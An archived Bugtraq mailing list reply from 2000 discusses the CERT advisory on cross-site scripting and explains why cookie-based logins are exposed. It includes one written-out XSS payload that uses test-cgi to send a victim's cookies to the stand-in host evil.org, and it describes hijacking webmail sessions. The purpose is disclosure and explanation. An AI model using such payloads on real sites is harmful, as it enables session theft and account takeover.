Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Fwd: CERT Advisory CA-2000-02
From: metal_hurlant () YAHOO COM (Henri Torgemane)
Date: Thu, 3 Feb 2000 14:22:38 -0800


First, what the CERT describes isn't one of the many implementation bugs we've
seen before, like bugs crashing the browser or giving access to local resources:
This is a design problem.

One obvious abuse could be to compromise online accounts:
Many sites use cookies to avoid asking for a username/password on every page of
their site. As a result, cookies are often equivalent to passwords.
Interestingly, javascript can access cookies on the domain from which the script
has been loaded.
Say, if your site uses cookies as a mean of authentication and has test-cgi
installed, you can get your user's cookies grabbed with a URL like:
<A HREF="http://yoursite.com/cgi-bin/test-cgi?a=<script">http://yoursite.com/cgi-bin/test-cgi?a=<script</A>>(new
Image).src="http://evil.org/?"+escape(document.cookie)</script>
Each time a user of your site happens to follow that URL, the log of the
evil.org web server will contain the cookies for his account.

In other cases, rather than actually taking the cookie, one can instead choose
to "remote-control" the browser, making it take actions to modify the user
account or grab some personal information (e-mail messages on a webmail system,
for example) without the user having a chance to see what's going on.

Hope it helps,
Henri Torgemane

Shockro () aol com wrote:

I'm curious as to how this could be used in a malicious manner, as opposed to
just being an annoyance.  I mean, god forbid, people should execute arbitrary
javascript on us.  Yes, we've all seen the file upload form exploit and the
1001 ways to crash Internet Explorer through infinite loops, but there's
nothing seriously harmful about this, am I right?  Please correct me if I'm
wrong.

Shockro
Support DeCSS
Support Reverse Engineering


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault